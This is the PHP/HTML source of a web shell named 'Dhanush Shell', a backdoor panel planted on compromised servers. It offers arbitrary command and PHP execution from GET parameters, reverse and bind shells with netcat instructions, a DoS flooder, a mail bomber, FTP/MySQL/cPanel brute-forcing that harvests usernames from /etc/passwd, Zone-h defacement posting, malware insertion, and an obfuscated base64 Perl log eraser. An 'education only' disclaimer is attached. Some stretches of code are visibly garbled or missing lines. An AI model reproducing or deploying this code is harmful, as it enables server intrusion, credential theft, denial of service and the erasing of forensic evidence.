<input type="text" name="sym" va
lue="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk'
,sym.value)" value="bypass" class="but">
</form>
</td>
</tr>
<tr>
<td colspan=2 align="center">
<p>Using Bypass function</p>
<form onSubmit="bypassfun('newty
pe',newtype.value,optiontype.value);return false;">
<input type="text" name="newtype
" value="/etc/passwd" class="sbox">
<select id="optiontype" class=sb
ox>
<option value="tac">tac</option>
<option value="more">more</optio
n>
<option value="less">less</optio
n>
<option value="rev">rev</option>
<option value="xxd">xxd</option>
</select>
<input type="button" OnClick="by

passfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
</form>
</td>
</tr>
</table>
</form>
<?php
}
//fuzzer
else if(isset($_GET['fuzz']))
{
?>
<form method="GET">
<tr>
IP
</td>
<td>
<input class="box" name="myip" value="127.0.0.1" onFocus
="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.
value='127.0.0.1';"/>
</td>
</tr>
<tr>
<td class="title">
Port
</td>
<td>
<input class="box" name="port" value="80" onFocus="if(th
is.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
</td>
</tr>
<tr>
<td class="title">
Timeout
</td>
<td>
<input type="text" class="box" name="time" value="5" onF
ocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.valu
e='5';"/>
</td>
</tr>
<tr>
<td class="title">
No of times
</td>
<td>
<input type="text" class="box" name="times" value="100"
onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this
.value='100';" />
</td>
</tr>
<tr>
<td class="title">
Message (The message Should be long and it will be multi
plied with the value after it)
</td>
<td>
<input class="box" name="message" value="%S%x--Some Garb
age here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this
.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x
%S';"/>
</td>
<td>
x
</td>
<td width="20">
<input style="width: 30px;" class="box" name="messageMul
tiplier" value="10" />
</td>
</tr>
<tr>
<td rowspan="2">
: 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.valu
e,time.value,times.value,message.value,messageMultiplier.value)" class="but" val
ue=" Submit "/>
</td>
</tr>
</table>
</form><div id="showdos"></div>
<?php
}
// Zone-h Poster
else if(isset($_GET["zone"]))
{
if(!function_exists('curl_version'))
{
echo "<pre style='margin-top:5px'><center><font >PHP CUR
L NOT EXIST</font></center></pre>";
}
?>
<center><font size="4" color="#FF0000">Zone-h Poster</font></cen
ter>
<table align="center" cellpadding="5" border="0">
<tr>
<td>
<input type="text" name="defacer" value="Attacker" class="box" /
></td></tr>
<tr><td>
<select name="hackmode" class="box">
<option >--------SELECT--------</option>
<option value="1">known vulnerability (i.e. unpatched sy
stem)</option>
<option value="2" >undisclosed (new) vulnerability</opti
on>
<option value="3" >configuration / admin. mistake</optio
n>
<option value="4" >brute force attack</option>
<option value="5" >social engineering</option>
<option value="6" >Web Server intrusion</option>
<option value="7" >Web Server external module intrusion<

/option>
<option
<option
<option
<option
<option
<option
<option
<option
<option
<option
<option
<option
value="8" >Mail Server intrusion</option>

value="9" >FTP Server intrusion</option>
value="10" >SSH Server intrusion</option>
value="11" >Telnet Server intrusion</option>
value="12" >RPC Server intrusion</option>
value="13" >Shares misconfiguration</option>
value="14" >Other Server intrusion</option>
value="15" >SQL Injection</option>
value="16" >URL Poisoning</option>
value="17" >File Inclusion</option>
value="18" >Other Web Application bug</option>
value="19" >Remote administrative panel access b
ruteforcing</option>
<option value="20" >Remote administrative panel access p
assword guessing</option>
<option value="21" >Remote administrative panel access s
ocial engineering</option>
<option value="22" >Attack against administrator(passwor
d stealing/sniffing)</option>
<option value="23" >Access credentials through Man In th
e Middle attack</option>
<option value="24" >Remote service password guessing</op
tion>
<option value="25" >Remote service password bruteforce</
option>
<option value="26" >Rerouting after attacking the Firewa
ll</option>
<option value="27" >Rerouting after attacking the Router
</option>
<option value="28" >DNS attack through social engineerin
g</option>
<option value="29" >DNS attack through cache poisoning</
option>
<option value="30" >Not available</option>
</select>
</td></tr>
<tr><td>
<select name="reason" class="box">
<option >--------SELECT--------</option>
<option value="1" >Heh...just for fun!</option>
<option value="2" >Revenge against that website</option>
<option value="3" >Political reasons</option>
<option value="4" >As a challenge</option>
<option value="5" >I just want to be the best defacer</o
ption>
<option value="6" >Patriotism</option>
<option value="7" >Not available</option>
</select></td></tr>
<tr><td>
<textarea name="domain" class="box" cols="47" rows="9">List Of D
omains</textarea></td></tr>
<tr><td>
<input type="button" onClick="zoneh(defacer.value,hackmode.value
,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
</form><div id="showzone"></div>
<?php }
//DDos
else if(isset($_GET['dos']))
{
?>
<form method="GET">
<tr>
IP
</td>
<td>
<input class="box" name=
"myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';"
onBlur="if(this.value=='')this.value='127.0.0.1';"/>
</td>
</tr>
<tr>
<td class="title">
Port
</td>
<td>
<input class="box" name=
"port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(th
is.value=='')this.value='80';"/>
</td>
</tr>
<tr>
<td class="title">
Timeout <font >(Time in
seconds)</font>
</td>
<td>
<input type="text" class
="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';"
onBlur="if(this.value=='')this.value='5';" />
</td>
</tr>
<tr>
<td class="title">
Execution Time <font >(Time in seconds)<
/font>
</td>
<td>
<input type="text" class="box" name="exT
ime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this
.value=='')this.value='10';"/>
</td>
</tr>
<tr>
<td class="title">
No of Bytes per/packet
</td>
<td>
<input type="text" class="box" name="noO
fBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBl
ur="if(this.value=='')this.value='999999';"/>
</td>
</tr>
<tr>
<td rowspan="2">
<input style="margin : 20px; margin-left

: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip
.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but
" value=" Attack >> "/>
</td>
</tr>
</table>
</form><div id="showdos"></div>
<?php
}
else if(isset($_GET['mailbomb']))
{ ?>
<center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb
')"><font class=txt size="4">| Mail Bomber |</font></a></td>
<td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt
size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showd
ata></div>
<?php
}
else if(isset($_GET['tools']))
{
?>
<center><br><form onSubmit="getport(host.value,protocol.value);r
eturn false;">
<table cellpadding="5" border="3" style="border-color:#333333; w
idth:50%;">
<tr>
<td colspan="2" align="center"><b><font size='4'
color="#FF0000">Port Scanner<br></font></b></td>
</tr>
<tr>
<td align="center">
<input class="sbox" type='text' name='host' valu
e='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
</td>
<td align="center">
<select class="sbox" name='protocol'>
<option value='tcp'>tcp</option>
<option value='udp'>udp</option>
</select>
</td>
<tr>
<td colspan="2" align="center"><input class="but" type='
button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
</tr>
</form>
<tr><td colspan=2><div id="showports"></div>
</td></tr></table>
<br>
<form onSubmit="bruteforce(prototype.value,serverport.value,logi
n.value,dict.value);return false;">
<table cellpadding="5" border="2" style="border-color:#333333; w
idth:50%;">
<tr>
<td colspan="2" align="center"><font size="4">Br
uteForce</font></td>
</tr>
<tr>
<td>Type : </td>
<td>
<select name="prototype" class="sbox">
<option value="ftp">FTP</option>
<option value="mysql">MYSQL</opt
ion>
<option value="postgresql">Postg
reSql</option>
</select>
</td>
</tr>
<tr>
<td>Server <b>:</b> Port : </td>
<td><input type="text" name="serverport" value="
<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
</tr>
<tr>
<td valign="middle">Brute type : </td>
<td><label><input type=radio name=mytype value="
1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=rev
erse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
<label><input type=radio name=mytype value="2">
Dictionary</label><br>
Login :       &nbs
p;<input type="text" name="login" value="root" class="sbox"><br>
Dictionary : <input type="text" name="dict" valu
e="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
</td>
</tr>
<tr>
<td colspan="2" align="center"><input type="butt
on" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)
" value="Attack >>" class="but"></td>
</tr>
</form><tr><td colspan="2" id="showbrute"></td></tr>
</table>
</center><br>
<?php
}
else if (isset($_GET["phpc"]))
{
?>
<div id="showresult"></div>
<form name="frm">
<textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
<br /><br />
<input name="submit" value="Execute This COde! " class="but" onClick="execod
e(code.value)" type="button" />
<label><input type="checkbox" id="intext" name="intext" value="disp"> <f
ont class=txt size="3">Display in Textarea</font></label>
</form>
<?php
}
else if(isset($_GET["exploit"]))
{
if(!isset($_GET["rootexploit"]))
{
?>
<center>
<form action="<?php echo $self; ?>" method="get" target="_blank"
>
<input type="hidden" name="exploit">

<table border="1" cellpadding="5" cellspacing="4" style=
"width:50%;border-color:#333333;">
<tr>
<td style="height:60px;">
<font size="4" class=txt>Select Website</font></td><td>
<p><select id="rootexploit" name="rootexploit" class="box">
<option value="exploit-db">Exploit-db</option>
<option value="packetstormsecurity">Packetstormsecurity<
/option>
<option value="exploitsearch">Exploitsearch</option>
<option value="shodanhq">Shodanhq</option>
</select></p></td></tr><tr><td colspan="2" align="center" style
="height:40px;">
<input type="submit" value="Search" class="but"></td></tr></tabl
e>
</form></center><br>
<?php
}
else
{
//exploit search
$Lversion = php_uname(r);
$OSV = php_uname(s);
if(eregi('Linux',$OSV))
{
$Lversion=substr($Lversion,0,6);
if($_GET['rootexploit'] == "exploit-db")
{
header("Location:http://www.exploit-db.com/searc
h/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
}
else if($_GET['rootexploit'] == "packetstormsecurity")
{
header("Location:http://www2.packetstormsecurity
.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
}
else if($_GET['rootexploit'] == "exploitsearch")
{
header("Location:http://exploitsearch.com/search
.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lver
sion");
}
else if($_GET['rootexploit'] == "shodanhq")
{
header("Location:http://www.shodanhq.com/exploit
s?q=Linux+Kernel+$Lversion");
}
}
else
{
$Lversion=substr($Lversion,0,3);
if($_GET['rootexploit'] == "exploit-db")
{
header("Location:http://www.exploit-db.com/searc
h/?action=search&filter_page=1&filter_description=$OSV+Lversion");
}
else if($_GET['rootexploit'] == "packetstormsecurity")
{
header("Location:http://www2.packetstormsecurity
.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
}
else if($_GET['rootexploit'] == "exploitsearch")
{
header("Location:http://exploitsearch.com/search
.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
}
else if($_GET['rootexploit'] == "shodanhq")
{
header("Location:http://www.shodanhq.com/exploit
s?q=$OSV+Lversion");
}
}
//End of Exploit search
}
}
// Connect
else if(isset($_REQUEST['connect']))
{
?>
<form action='<?php echo $self; ?>' method='POST' >
<table style="width:50%" align="center" >
<tr>
<th colspan="1" width="50px">Reverse Shell</th>
<th colspan="1" width="50px">Bind Shell</th>
</tr>
<tr>
<td>
<table style="border-spacing: 6px;">
<tr>
<td>IP </td>
<td>
<input type="text" class="box" style="width: 200px;" nam
e="ip" value="<?php yourip();?>" />
</td>
</tr>
<tr>
<td>Port </td>
<td><input style="width: 200px;" class="box" name="port" siz
e='5' value="9891"/></td>
</tr>
<tr>
<td style="vertical-align:top;">Use:</td
>
<td><select style="width: 95px;" name="l
ang" class="sbox">
<option value="perl">Perl</optio
n>
<option value="python">Python</o
ption>
<option value="php">PHP</option>
</select>
<input type="submit" style="width: 90px;
" class="but" value="Connect!" name="backconnect"/></td>
</tr>
</table> </form>
</td>
<td style="vertical-align:top;">
<form method='post' >

<table style="border-spacing: 6px;">
<tr>
<td>Port</td>
<td>
<input style="width: 200px;" class="box" name="port" val
ue="9891" />
</td>
</tr>
<tr>
<td>Password </td>
<td>
<input style="width: 200px;" cla
ss="box" name="passwd" value="Dhanush"/>
</td>
<tr>
<td>Using</td>
<td>
<select style="width: 95px;" nam
e="lang" id="lang" class="sbox">
<option value="perl">Perl</optio
n>
<option value="c">C</option>
</select>
<input style="width: 90px;" clas
s="but" type="submit" name="backdoor" value=" Bind "/></td>
</tr>
</table>
</td>
</form>
</tr>
<tr><td colspan=2><font color="#FF0000">Click "Connect" only after open
port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat a
nd give it the command 'nc <?php yourip(); ?> 9891"!</font></td></tr>
</table>
<?php
}
else if(isset($_REQUEST['404']))
{
?>
<center><table><tr><td><a href=javascript:void(0) onClick="getdata('404n
ew')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
<td><a href=javascript:void(0) onClick="getdata('404page')"><fon
t class=txt size="4">| Set Specified 404 Page |</font></a></td>
</tr></table></center><br>
<div id="showdata"></div>
<?php
}
else if(isset($_GET['about']))
{ ?>
<center>
<p><font size=6><u>D h a n u s h</u></font><br>
<font size=5>[--==Coded By Arjun==--]</font>
<div style='font-family: Courier New; font-size: 10px;'><fon
t class=txt ><pre>
- -- -- -- --
----- --------------------------- -------------- ------- ---- -------------------------------- --- -- ------------------</pre></font></div></center>

<font class="txt">Dhanush Shell is a PHP Script, created for che
cking the vulnerability and security of any web server or website. With this PHP
script, the owner can check various vulnerablities present in the web server. T
his shell provide you almost every facility that the security analyst need for p
enetration testing. This is a "All In One" php script, so that the user do not n
eed to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<b
r> This script is only coded for education purpose or testing on your own server
.The developer of the script is not responsible for any damage or misuse of it</
font><br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font
size=6>| जय महाकाल | | ज&
#2351; हिन्द |</font></center><br>
<?php }
else if(isset($_GET['database']))
{ ?>
<form onSubmit="mydatabase(server.value,username.value,password.value);r
eturn false;">
<table id="datatable" style="width:90%;" cellpadding="4" align="center">
<tr>
<td colspan="2">Connect To Database</td>
</tr>
<tr>
<td>Server Address :</td>
<td><input type="text" class="box" name="server" value="localhos
t"></td>
</tr>
<tr>
<td>Username :</td>
<td><input type="text" class="box" name="username" value="root">
</td>
</tr>
<tr>
<td>Password:</td>
<td><input type="text" class="box" name="password" value=""></td
>
</tr>
<tr>
<td></td>
<td><input type="button" onClick="mydatabase(server.value,userna
me.value,password.value)" value=" Connect " name="executeit" class="but"></td>
</tr>
</table>
</form>
<div id="showsql"></div>
<?php
}
// Cpanel Cracker
else if(isset($_REQUEST['cpanel']))
{
$cpanel_port="2082";
$connect_timeout=5;
?>
<center>
<form method=post>
<table style="width:50%;border-color:#333333;" border=1 cellpadd
ing=4>
<tr>
<td align=center colspan=2>Target : <input type=
text name="server" value="localhost" class=sbox></td>
</tr>
<tr>
<td align=center>User names</td><td align=center
>Password</td>
</tr>
<tr>
<td align=center><textarea name=username rows=25
cols=22 class=box><?php
if($os != "Windows")
{
if(@file('/etc/passwd'))
{
$users = file('/etc/passwd');
foreach($users as $user)
{
$user = explode(':', $us
er);
echo $user[0] . "\n";
}
}
else
{
$temp = "";
$val1 = 0;
$val2 = 1000;
{
$uid = @posix_getpwuid($
val1);
if ($uid)
$temp .= join('
:',$uid)."\n";
}
if($file5 = fopen("test.txt","w
"))
{
fclose($file5);
$file = fopen("test.txt
", "r");
while(!feof($file))
{
$s = fgets($file
);
$matches = array
();
$t = preg_match(
'/\/(.*?)\:\//s', $s, $matches);
$matches = str_r
eplace("home/","",$matches[1]);
es) > 12 || strlen($matches) ==
s" || $matches == "var/lib/nfs"
r/gopher" || $matches == "sbin"
es" || $matches == "var/ftp" ||
| $matches == "var/named")
if(strlen($match
0 || $matches == "bin" || $matches == "etc/X11/f
|| $matches == "var/arpwatch" || $matches == "va
|| $matches == "var/adm" || $matches == "usr/gam
$matches == "etc/ntp" || $matches == "var/www" |
continue
;
echo $matches;
}
fclose($file);
}
}
}
?></textarea></td><td align=center><textarea na
me=password rows=25 cols=22 class=box></textarea></td>
</tr>
<tr>
<td align=center colspan=2>Guess options : <labe
l><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</lab
el><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><labe
l><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
</tr>
<tr>
<td align=center colspan=2>Timeout delay : <inpu
t type="text" name="delay" value=5 class=sbox></td>
</tr>
<tr>
<td align=center colspan=2><input type="submit"
name="cpanelattack" value=" Go
" class=but></td>
</tr>
</table>
</form>
</center>
<?php
}
else if(isset($_REQUEST['malattack']))
{
?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
<center><table><tr><td><a href=# onClick="getdata('malware')"><font clas
s=txt size="4">| Malware Attack |</font></a></td>
<td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">|
Insert Own Code |</font></a></td></tr></table></center><br>
<div id="showdata"></div>
<?php
}
else if(isset($_GET["com"]))
{
echo "<br>";
ob_start();
eval("phpinfo();");
$b = ob_get_contents();
ob_end_clean();
$a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
$z = strpos($b,"</body>");
$s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
echo $s_result;
}
else if(isset($_GET['execute']))
{
$comm = $_GET['execute'];
chdir($_GET['executepath']);
$check = shell_exec($comm);
echo "<center><textarea id=showexecute cols=120 rows=20 class=box>" . $c
heck . "</textarea></center>";
?>
<BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET
['executepath']); ?>',execute.value);return false;">
<input type="text" class="box" name="execute">
<input type="button" onClick="executemyfn('<?php echo addslashes($_GET['
executepath']); ?>',execute.value)" value="Execute" class="but"></form></center>
<?php
}
else if(isset($_GET['mycmd']))
{
if($_GET['mycmd']=="logeraser")
{
$erase = gzinflate(base64_decode("xVhtb9s2EP6cAv0PXJIBDdZaLfbR27
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
fyX3/+Bw=="));
if(is_writable("."))
{
if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
{
fwrite($openp, $erase);
fclose($openp);
passthru("perl logseraser.pl linux");
unlink("logseraser.pl");
echo "<center><font color=#FFFFFF size=3>Logs Cl
eared</font></center>";
}
} else
{
if($openp = fopen("/tmp/logseraser.pl", 'w'))
{
fwrite($openp, $erase)or die("Error");
fclose($openp);
$aidx = passthru("perl logseraser.pl linux");
unlink("logseraser.pl");
echo "<center><font color=#FFFFFF size=3>Logs Cl
eared</font></center>";
}
}
}
else
{
$check = shell_exec($_GET['mycmd']);
echo "<center><textarea cols=120 rows=20 class=box>" . $check .
"</textarea></center>";
}
}
else if(isset($_GET['prototype']))
{
echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['
prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).
'<br>';
if( $_GET['prototype'] == 'ftp' )
{
function BruteFun($ip,$port,$login,$pass)
{
$fp = @ftp_connect($ip, $port?$port:21);
if(!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
}
elseif( $_GET['prototype'] == 'mysql' )
{
{
$res = @mysql_connect($ip.':'.$port?$port:3306, $login,
$pass);
@mysql_close($res);
return $res;
}
}
elseif( $_GET['prototype'] == 'pgsql' )
{
{
$str = "host='".$ip."' port='".$port."' user='".$login."
' password='".$pass."' dbname=postgres";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_GET['server']);
if($_GET['type'] == 1)
{
$temp = @file('/etc/passwd');
if( is_array($temp))
foreach($temp as $line)
{
$line = explode(":", $line);
++$attempts;
if(BruteFun(@$server[0],@$server[1], $line[0], $
line[0]) )
{
$success++;
echo '<b>'.htmlspecialchars($line[0]).'<
/b>:'.htmlspecialchars($line[0]).'<br>';
}
if(@$_GET['reverse'])
{
$tmp = "";
for($i=strlen($line[0])-1; $i>=0; --$i)
$tmp .= $line[0][$i];
++$attempts;
if(BruteFun(@$server[0],@$server[1], $li
ne[0], $tmp) )
{
$success++;
echo '<b>'.htmlspecialchars($lin
e[0]).'</b>:'.htmlspecialchars($tmp);
}
}
}
}
elseif($_GET['type'] == 2)
{
$temp = @file($_GET['dict']);
if( is_array($temp) )
foreach($temp as $line)
{
$line = trim($line);
++$attempts;
if(BruteFun($server[0],@$server[1], $_GET['login
'], $line) )
{
$success++;
echo '<b>'.htmlspecialchars($_GET['login
']).'</b>:'.htmlspecialchars($line).'<br>';
}
}
}
echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Succ
ess:</span> <font class=txt>$success</font></div>";
}
// Execute Query
else if(isset($_GET["executeit"]))
{
if(isset($_GET['username']) && isset($_GET['server']))
{
$dbserver = $_GET['server'];
$dbuser = $_GET['username'];
$dbpass = $_GET['password'];
if(mysql_connect($dbserver,$dbuser,$dbpass))
{
setcookie("dbserver", $dbserver);
setcookie("dbuser", $dbuser);
setcookie("dbpass", $dbpass);
listdatabase();
}
else
echo "cannotconnect";
}
}
else if(isset($_GET['action']) && isset($_GET['dbname']))
{
if($_GET['action'] == "createDB")
{
$mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass
);
mysql_query("create database $dbname",$mysqlHandle);
listdatabase();
}
if($_GET['action'] == 'dropDB')
{
$mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass
);
mysql_query("drop database $dbname",$mysqlHandle);
listdatabase();
}
if($_GET['action'] == 'listTables')
{
listtable();
}
// Create Tables
if($_GET['action'] == "createtable")
{
$tablename = $_GET['tablename'];
$mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpas
s);
mysql_query("CREATE TABLE $tablename ( no INT )");
listtable();
}
// Drop Tables
if($_GET['action'] == "dropTable")
{
s);
mysql_query("drop table $tablename");
listtable();
}
// Empty Tables
if($_GET['action'] == "empty")
{
s);
mysql_query("delete from $tablename");
listtable();
}
// Empty Tables
if($_GET['action'] == "dropField")
{
$fieldname = $_GET['fieldname'];
s);
$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldna
me";
mysql_select_db( $dbname, $mysqlHandle );

mysql_query( $queryStr , $mysqlHandle );
listtable();
}
if($_GET['action'] == 'viewdb')
{
listdatabase();
}
// View Table Schema
if($_GET['action'] == "viewSchema")
{
s);
echo "<br><div><font color=white size=3>[ $dbname ]</fon
t> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb
')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font
> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font s
ize=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log
Out ]</font> </a></div>";
$pResult = mysql_query( "SHOW fields FROM $tablename" );
$num = mysql_num_rows( $pResult );
echo "<br><br><table align=center cellspacing=4 style='w
idth:80%;' border=1>";
echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</t
h></th>";
for( $i = 0; $i < $num; $i++ )
{
$field = mysql_fetch_array( $pResult );
echo "<tr>\n";
echo "<td>".$field["Field"]."</td>\n";
echo "<td>".$field["Type"]."</td>\n";
echo "<td>".$field["Null"]."</td>\n";
echo "<td>".$field["Key"]."</td>\n";
echo "<td>".$field["Default"]."</td>\n";
echo "<td>".$field["Extra"]."</td>\n";
$fieldname = $field["Field"];
echo "<td><a href=# onClick=\"viewtables('dropFi
eld','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
echo "</tr>\n";
}
echo "</table>";
echo "<div><font color=white size=3>[ $dbname ]</font> <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"
> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a
href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=
3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out
]</font> </a></div>";
}
// Execute Query
if($_GET['action'] == "executequery")
{
s);
$result = mysql_query($_GET['executemyquery']);
// results
echo "<html>\r\n". strtoupper($_GET['executemyquery']) .
"<br>\r\n<table border =\"1\">\r\n";
$count = 0;
while ($row = mysql_fetch_assoc($result))
{
echo "<tr>\r\n";
if ($count==0) // list column names
{
echo "<tr>\r\n";
while($key = key($row))
{
echo "<td><b>" . $key . "</b></td>\r\n"
;
next($row);
}
echo "</tr>\r\n";
}
foreach($row as $r) // list content of column names
{
if ($r=='') $r = '<font >NULL</font>';
echo "<td><font class=txt>" . $r . "</font></t
d>\r\n";
}
echo "</tr>\r\n";
$count++;
}
echo "</table>\n\r<font class=txt size=3>" . $count . "
rows returned.</font>\r\n</html>";
echo "<div><font color=white size=3>[ $dbname ]</font> <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"
> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a
href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=
3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out
]</font> </a></div>";
}
// View Table Data
if($_GET['action'] == "viewdata")
{
global $queryStr, $action, $mysqlHandle, $dbname, $table
name, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;

?>
<br><br>
<form>
<table>
<tr>
<td><textarea cols="60" rows="7" name="e
xecutemyquery" class="box">Execute Query..</textarea></td>
</tr>
<tr>
<td><input type="button" onClick="viewta
bles('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename
']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
</tr>
</table>
</form>
<?php
